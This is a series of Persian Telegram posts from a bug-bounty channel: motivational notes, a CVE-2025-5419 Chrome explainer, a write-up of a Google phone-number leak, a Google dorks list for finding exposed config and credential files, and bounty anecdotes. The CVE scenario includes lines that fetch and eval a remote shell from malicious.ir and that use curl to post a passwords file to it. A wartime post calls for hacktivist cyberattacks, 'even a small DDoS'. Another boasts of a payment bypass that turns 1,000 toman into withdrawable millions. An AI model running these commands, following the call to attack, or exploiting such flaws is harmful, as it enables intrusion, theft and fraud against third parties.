یه کانالی هست که در نگاه اول یه سری اطلاعات نسبتا قدیمی ولی بیسیکی رو گذاشته ولی توی تارگت های ایرانی ممکنه خیلی جواب بدن اگر توی تایم ازادتون میخواستن علکی ریلز اینستاگرام نگاه کنید میتونید این کانال رو نگاه کنید تا توی حرفه خودتون اپدیت بشید!
https://news.1rj.ru/str/GitBook_s

ولی در کل همیشه سعی کنید رو به جلو باشید هیچ وقت رو به عقب نباشید و یه جا استپ نکنید که این بدترین کار توی جوانیه!
باگ بزنید!

#سرگرمی

شما باید برای دیدن همچین لحظاتی : بی خوابی بکشید ، درد بکشید ، سختی بکشید ، سرو کله زدن و مذاکره کردن یاد بگیرید ، بی حوصلگی بکشید ، روزی 12 ساعت کار بکشید ، روزی 6 ساعت خواب بکشید ، و ....

ولی در نهایت چیزی که تمام اینها رو از یادتون میبره این لحضاتیه که چنین انرژی به ادم میده جایی که همه هم سن ها دنبال چیزای متفرقه هستن تو با توکل و تلاش و تفکر تونستی یه قدم جلو تر باشی این کلمه که بابا از کحا اوردی این پولارو خستگی رو از تن آدم به در میبره بهتون قول میدم که همینطور باشه.


و در آخر باگ بزنید!

#انگیزه

امروز روز خوبیه باگ بزنید! هدف این ماه رو بزارید و پرش کنید❤️

🚨 کشف 0Day در گوگل کروم!

📢 یه زیرودی با کد CVE-2025-5419 (امتیاز CVSS: 8.8) تو مرورگر گوگل کروم پیدا شده.

🕵️‍♂️ ماجرا چیه؟
این آسیب‌پذیری یه مشکل خواندن و نوشتن خارج از محدوده تو موتور جاوا اسکریپت V8 و WebAssembly کرومه که توسط کلمنت لسین و بنوا سون از تیم تحلیل تهدید گوگل (TAG) کشف شده.

🔍 چرا خطرناکه؟
شناسه باگ: CVE-2025-5419
امتیاز CVSS: 8.8 (بسیار خطرناک!)
مشکل اصلی: هکر می‌تونه با یه صفحه HTML مخرب، از خرابی پشته سوءاستفاده کنه و کد دلخواهش رو روی سیستم شما اجرا کنه.
تاثیر: دسترسی غیرمجاز، سرقت اطلاعات حساس، یا حتی نصب بدافزار (مثل باج‌افزار یا جاسوس‌افزار).

ویژگی‌های خطرناک:
حمله از راه دور: فقط با باز کردن یه صفحه وب مخرب، سیستم شما در خطره!
بدون نیاز به تعامل زیاد: یه کلیک ساده می‌تونه کافی باشه.
استفاده گسترده: کروم تو لپ‌تاپ‌ها، گوشی‌ها و حتی سرورهای سازمانی پراستفاده‌ست، پس هدف جذابی برای هکرهاست.

🔥 سناریو: هک سیستم شما از طریق یه لینک مخرب!
قدم ۱: پیدا کردن قربانی
هکر یه وب‌سایت جعلی یا تبلیغ مخرب می‌سازه و لینک اونو از طریق ایمیل، پیام تلگرام یا شبکه‌های اجتماعی پخش می‌کنه. مثلاً:

http://malicious-site.ir/promo.html

قدم ۲: سوءاستفاده از CVE-2025-5419
وقتی شما روی لینک کلیک می‌کنید، صفحه HTML مخرب یه payload جاوا اسکریپت اجرا می‌کنه که از نقص V8 سوءاستفاده می‌کنه. نمونه کد مخرب:

const wasmCode = new Uint8Array([0x00, 0x61, 0x73, 0x6D, ...]);
const wasmModule = new WebAssembly.Module(wasmCode);
const wasmInstance = new WebAssembly.Instance(wasmModule);
wasmInstance.exports.exploit(); 

این کد باعث خرابی پشته می‌شه و به هکر اجازه می‌ده کد دلخواهش رو اجرا کنه.
قدم ۳: دسترسی به سیستم
هکر یه وب‌شل یا بدافزار روی سیستم شما آپلود می‌کنه:

fetch('http://malicious.ir/shell.js')
  .then(response => response.text())
  .then(noscript => eval(noscript));

حالا هکر می‌تونه فایل‌های شما رو بدزده، وب‌کم رو روشن کنه یا حتی سیستم رو قفل کنه!
قدم ۴: سرقت اطلاعات و خرابکاری
هکر اطلاعات حساس (مثل رمزها یا فایل‌های شخصی) رو می‌دزده:

curl -X POST http://malicious.ir/steal -d "$(cat ~/.passwords)"

یا بدافزار نصب می‌کنه و ردشو پاک می‌کنه تا کسی نفهمه!

🛡 چطور از خودمون محافظت کنیم؟
برای اینکه قربانی این زیرودی نشید:
فوراً آپدیت کنید: کروم رو به نسخه 137.0.7151.68/.69 (ویندوز و مک) یا 137.0.7151.68 (لینوکس) آپدیت کنید.
تو کروم برید به:
Settings > About Chrome
و آپدیت رو چک کنید.
به‌روزرسانی خودکار رو روشن کنید: اینجوری همیشه آخرین وصله‌های امنیتی رو دارید.
لینک‌های مشکوک رو باز نکنید: ایمیل‌ها یا پیام‌های ناشناس رو چک کنید.
آنتی‌ویروس به‌روز داشته باشید: می‌تونه بدافزارهای احتمالی رو شناسایی کنه.
فایروال فعال کنید: جلوی اتصالات مشکوک رو می‌گیره.

🌐 منبع:
https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html

به طور کلی من شخصیت ادما رو نمیخام توجیه کنم ولی این حرفش خیلی درسته !
https://www.instagram.com/reel/DKiAX0TKTWB/?utm_source=ig_web_copy_link

امام جواد میگه:

تا کاری قطعی نشده و نتیجه نداده آن را سر زبان ها نندازید ، همه از موفقیت شما خوشحال نمیشوند و اگر یکی آه بکشد اون کار سر نمیگیره

باگ های سمت لاجیک برنامه رو زیاد کار کنید که خیلی خوبن مثلا اینجا از یکی از وبسایت های خیلی خوب این باگو زدیم bypass Payment proccess با پرداخت 1000 تومان کیف پول رو در حد 110 میلیون تومان شارژ میکنیم ، و جالبیش اینجاست که این وبسایت یه فیچری داره که میتونی از کیف پولت پول خارج کنی و به کارت بانکیت واریز کنی یعنی من با پرداخت 1000 تومان میتونم الان 110 میلیون کارت بانکیم رو شارژ کنم


باگ های لاجیک رو زیاد کار کنید و در نهایت

باگ بزنید!

#تجربه

🔴 یک محقق امنیتی بنام brutecat، با استفاده از brute-force تونسته با موفقیت شماره تلفن پشت اکانتهای گوگل رو بدست بیاره.

شروع تحقیق اینجوری بوده که ایشون JS رو در مرورگرش غیر فعال کرده تا ببینه آیا سرویسی بدون JS کار میکنه یا نه که متوجه شده بازیابی نام کاربری همچنان کار میکنه. در ادامه متوجه شده که فرم بازیابی، بررسی میکنه که ایمیل یا شماره تلفن بازیابی به یک نام (Display Name) مرتبط هستش یا نه.

اگه شماره هلند رو نظر بگیریم، 10 تا عدد هستش، اولش همیشه با 06 شروع میشه و دو تا رقم آخرش رو هم اگه از hint بدست بیاریم، میمونه 6 رقم که میشه 10 به توان 6 = یک میلیون.

در تلاش اول اومده brute-force کنه اما با کپچا مواجه و شکست خورده. برای دور زدن این محدودیت رفته سراغ IPv6 اما باز نتیجه نگرفته. در نهایت با بررسی بیشتر متوجه شده که در فرم بدون JS، توکن botguard هیچ محدودیتی در تعداد درخواست نداره و تونسته این محدودیت رو دور بزنه و brute-force کنه.

برای اینکه این حمله رو روی یک فرد انجام بده، 2 تا چیز نیاز هستش:

1- نام 2- کد کشور

برای کد کشور با توجه به اینکه گوگل از libphonenumber استفاده میکنه، محقق اسکریپتی رو نوشته که اینارو درآورده.

برای نام هم اومده سندی در Looker Studio ایجاد کرده و مالکیت اون به قربانی انتقال داده.

این حمله روی شماره های آمریکا 20 دقیقه، بریتانیا 4 دقیقه، هلند 15 ثانیه و سنگاپور 5 ثانیه طول کشیده.

آسیب پذیری 25 فروردین به گوگل گزارش و اصلاح شده و 5 هزار دلار بانتی داشته.

ایشون چند ماه پیش هم یک آسیب پذیری در یوتیوب پیدا کرده بودن که ایمیل سازنده یوتیوب رو افشاء میکرد و بابتش 20 هزار دلار بانتی گرفتن.

#باگ_بانتی #گوگل
#bugbounty #google #BruteForce

از یه جا به بعد دیگه طرز تفکر و دیدگاه تو تورو پیشرفت میده و مطالب کمک خاصی نمی‌کنند.


باگ بزنید!

🔍 Google Dorks for Bug Bounty & Web Security!
A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting!

- Broad Domain Search (Exclude Common Subdomains)

site:example.com -www -shop -share -ir -mfa

- PHP Files with Parameters
site:example.com ext:php inurl:?

- API Endpoints Discovery
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3

- Juicy Extensions (Sensitive Files)

site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json

- High-Value InURL Keywords
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com

- Finding Server Errors
inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com

#Trick #Goolgle_dorks

Author: zarvan
Language: Persian
Telegram channel: @web_articles

بازار کار همه خوابیده
جنگ آبادانی رو میبره از کشور ولی بعد از پیروزی همه رو میشه درست کرد انشالله به امید #پیروزی_ایران

در هیچ کجای دنیا در جنگ مراکز خبری را هدف قرار نمیدهند ولی این ملت و قوم قاتل و جنایتکار امروز صدا و سیمای جمهوری اسلامی ایران یعنی کشورمون رو مورد هدف قرار داد و واقعا افتخار میکنم که همچین مردمی داریم که حتی در زمانی که موشک خورده بود هم باز هم کم نیاوردن
به زودی داریم تحقیق هایی رو انجام میدیم هرچند کوچک ولی یه حرکتی در دنیای سایبری باید انجام بدیم حتی یه دیداس کوچک

اگر کشور ما زمین بخوره توی این جنگ همه ما زمین میخوریم ناموس ما زمین میخوره خاک ما زمین میخوره و اون موقع هیچ علمی به کارمون نمیاد نه امنیت شبکه نه امنیت وب اپلیکیشن نه امنیت اینترنت اشیا
پس الان هرچی رو که میدونی استفاده کنید از هرچیزی که بلدید استفاده کنید
بعضی وقتا با یه xss ساده میتونی یه سرور رو در دست بگیری با یه سناریو و استراتژی قدرتمند


مراقب خودتون باشید و موفق باشید!

در حال حاضر با اینترنت ملی اکثر فیلترشکن ها قطع هستن و فقط بعضی از SSH تونل ها کار میکنن که تعداد خیلی خیلی زیادشون هم بسیار کند هستن

بهترین راه استفاده از پلتفرم های ایرانیه فعلا تا اینترنت ها برگرده
#پیروزی_ایران

اینترنت ها برگشته ولی زیر ساخت ها تا دوباره جون تازه بگیرن طول میکشه

دوباره روال عادی زندگی و باگ بانتی رو شروع میکنیم!

ببینید تجربه من توی این یکی دو سال نشون داده که واقعا توی ایران کار کردن بانتی به مراتب راحت تر از خارج از کشوره ولی یه ایرادی داره اینه که پاسخگو نیستن!
ببینید من الان حدودا 2 ماهه که دارم دنبال یه سایت معروف (آموزش برنامه نویسی میده حرفه ای) و بزرگ میدوم که یکی پاسخگو باشه که 3 تا باگ کریتیکالی که ازشون زدم رو پچ کنن
ولی درعوض بعضی سایتا هم هستن که واقعا خوب برخورد میکنن و پیگیر کار میشن

در کل تارگت خوب انتخاب کنید و خودتونو سریع جمع و جور کنید که بازار کار داره برمیگرده

باگ بزنید! ❤️🙏

فعلا روی هر وبسایتی که میری باگ میزنی یا میگه بخاطر جنگ درآمدمون قطع شده یا جوابتو نمیده یام کلا گزارش رو میگیرن و جوابتو نمیدن

مراقب باشید و با مزاکره درست برین جلو!

محمد عزیز یکی از دانشجویان کاربلد منتورینگ که تو این یکی دو سال نشون داده که پتانسیل بالا و فوق العاده ای داره
یک ابزار خیلی خوب و اصولی نوشته برا بحث باگ بانتی و مس هانت در زمینه ریکان که میتوانید ازش استفاده کنید :

https://github.com/MrMohammad81/watchtower

برنامه رسمی باگ بانتی که وابسته به دولت هم هست و توش Reflected XSS به عنوان N/A یا آسیب پذریری غیر قابل قبول شناخته بشه واقعا کنسل و خنده داره😑کلا بعضی از این 24 دارا رو باید بزاری کنار و توی برنامه های باگ بانتیشون کار نکرد
انشالله که اوضاع بهتر شه

#تجربه

یکی از تجربه های تلخی که یادمه داشتم این بود که اوایل کارم بود، و یه تارگت خوب خورده بود بهم و اولین باگ های عمرم رو روی تارگت واقعی زده بودم
Race condition
3 idor lead Pii leak
Reflected Xss

بعد یادمه پیام دادیم و همه کارا داشت توب پیش می‌رفت باگ Race رو رو قبول کردن که بانتی بدن مبلغ 2.5 منم خوشحال که اولین بانتی عمرمه
بعد گفت که خب شماره کارت و اطلاعات بده دادم بعد رفتیم برا ادامه کار
Idor هارو دادم گفتن که تیم پنتست خودمون درآورده اینارو

بعد می‌شناختم پنتست کارشون رو یکی از اساتید بود گفت که با تاخیر 12 ساعت من زود تر از تیم پنتست شون باگ رو زدن
صحبت کردیم قبول نکردن که باگ مال منه و بانتیش هم متعلق به منه بعد به این نتیجه رسیدم که توی ایران اتفاق های غیر منتظره زیاد میوفته
نمونش همین دیروز که Stored Xss روی وبسایت خوبی که بانتی های خوبی هم میده و اولش گ داره قبول نکرد و هنوزم قبول نمیکنه که این باگه! خودتونو تو ایران برای این اتفاقات آماده کنید

#تجربه